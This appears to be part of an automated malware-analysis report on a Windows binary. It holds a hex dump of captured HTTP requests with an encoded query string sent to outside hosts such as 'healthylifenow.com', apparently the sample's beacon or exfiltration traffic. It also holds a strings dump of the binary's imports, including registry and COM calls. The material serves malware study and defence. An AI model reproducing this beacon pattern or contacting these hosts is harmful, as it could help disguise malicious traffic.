0x000000f0 (00240)   6574662e 636f6d0d 0a557365 722d4167   etf.com..User-Ag
0x00000100 (00256)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000110 (00272)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000120 (00288)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000130 (00304)   4e542035 2e31290d 0a436f6e 74656e74   NT 5.1)..Content
0x00000140 (00320)   2d4c656e 6774683a 20300d0a 436f6e6e   -Length: 0..Conn
0x00000150 (00336)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x00000160 (00352)   0a324256 7441676c 64525032 504d7137   .2BVtAgldRP2PMq7
0x00000170 (00368)   3566396a 684b5462 4e4a4c55 377a7547   5f9jhKTbNJLU7zuG
0x00000180 (00384)   54694130 61555679 6f526e6c 634f6c4c   TiA0aUVyoRnlcOlL
0x00000190 (00400)   4f534e37 46583874 727a4638 39334272   OSN7FX8trzF893Br
0x000001a0 (00416)   48596e6e 514d644c 53334e70 74483649   HYnnQMdLS3NptH6I
0x000001b0 (00432)   62645670 6e744c50 616e6939 33584543   bdVpntLPani93XEC
0x000001c0 (00448)   6f4b617a 33796434 424c704b 6f253246   oKaz3yd4BLpKo%2F
0x000001d0 (00464)   55364a48 39204854 54502f31 2e300d0a   U6JH9 HTTP/1.0..
0x000001e0 (00480)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x000001f0 (00496)   650d0a48 6f73743a 20686561 6c746879   e..Host: healthy
0x00000200 (00512)   6c696665 6e6f772e 636f6d0d 0a416363   lifenow.com..Acc
0x00000210 (00528)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x00000220 (00544)   67656e74 3a206d6f 7a696c6c 612f322e   gent: mozilla/2.
0x00000230 (00560)   300d0a0d 0a                           0....


Strings
g......
.xg....C
+.
{#.[.9d
..
D=...I...0*D....
}
D.fRU!.....
..[|.+e.....7c$.-.?,-...!.
R
..&R..y.V....
6.
.
.
.
K
..(
040904b0
0g%C
1.0.0.3
1134
'1sb
2C@"
A0#'
B@Q#a
E1rD
esq1
#f@&
FileVersion
$G2F
jjjjjj
PrivateBuild
ProductVersion
$`q 
QAB'
RBpQR0
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
2ylGKm
*4F	dS
4<Yj:h
4yXC\o<
~5K`ybXL
{5P!._
5TlJ=c
64Ha	`
>^<6Jc
6nW(Ot
72dBbt>
7zGfr2
8lK%kL
}9%{9x
9Er}amyp
9UMXr$
ADVAPI32.dll
ApW4@E
aS^bc1_
A""u-G
@B4VmTk
bcp`=X
BHwA.?
B;i=N&#
]'bNNW:
bQ=U\nUv
Bsx1J&
Bv)]n/`
[=</]C
c1^EEt
c`A8hj
Cb>[$&
CharNextW
CharUpperW
CoCreateInstance
CoInitialize
CoRegisterClassObject
CoRevokeClassObject
CoTaskMemAlloc
CoTaskMemFree
CoTaskMemRealloc
CoUninitialize
(;c+Qi
CreateFileMappingW
CreateStdAccessibleObject
:cSF]a
 d90_Vy@
@.data
DispatchMessageW
dwpQinB
dXG/C5
=E\+1sX
e8Agb.
EnumResourceNamesA
ES[BR"}
Ew)1e!
FillConsoleOutputCharacterA
FindClose
FKw:xH
FreeEnvironmentStringsW
+}< fv,H
,GA_}!2
GetACP
GetCPInfo
GetLastError
GetMessageW
GetModuleHandleW
GetProcessWorkingSetSize
GetTickCount
GlobalAlloc
GlobalFree
;	h4xq
HS*C4<
hy.UK:a"
hYw*:N
\iLJ>g
|IL.v#
InitializeCriticalSection
.isete
JFT{16k{
j>kl5n
	jLT\E
JrI& J
J(t.#M
KERNEL32.dll
KillTimer
Kn@Jm+
kOYars
K]XO'x1
Lb"j0|
LockResource
LresultFromObject
;l:RUS
lstrcmpiW
lstrcpyA
lstrcpyW
lstrlenW
m073	kV
MApt1Z
m:bCHp
mHOtT,
m|}lPw
MR0`gg
MultiByteToWideChar
[N~?/#
N%>:fZY
NqtBEx
nU(>)U
OgGD7V.
ole32.dll
OLEACC.dll
OutputDebugStringW
Oy1H<Q
Pah`WIJ
PathCombineW
PathFileExistsW
p[eVeOR,G
 "'Pj=2PG
p-L=OH
p[nW-bu
PostThreadMessageW
Q3-27p
Q9ZczI
	Q?NL,9
qrKds?
RAgExwHS
`.rdata
RegCloseKey
RegCreateKeyExW
RegDeleteKeyW
RegDeleteValueW
RegEnumKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegSetValueExW
roh:+z
_@r	tj
(RZY(F
s]\73I
SendMessageA
SetTimer
s<&)gD
SHLWAPI.dll
\~<s"N
StringFromCLSID
StringFromGUID2
\t="?#
t2	3,Ai9
t7d _q
TA0*/(T^
tG	 N]
!This program cannot be run in DOS mode.
-T?JMf
.TPiG2
TranslateMessage
T[RJUp/
twyv,!
UnregisterClassA
uqrR+J
USER32.dll
`+/UsL
Va}"0`
vB0(0X)3:
vmwS\/
w	/FSh
WideCharToMultiByte
wsprintfW
wtW,+?x*
.w$]/X(
w=%z>!
Wzr.ch
)XAG`@@
XR=Ag7
XX7$jgH
])}~:y
Y2vv(	
!Y6~8M
Y>,Bk	`
+-Y*F7
y=I>=$
Y%{V<&]
Z*.O5%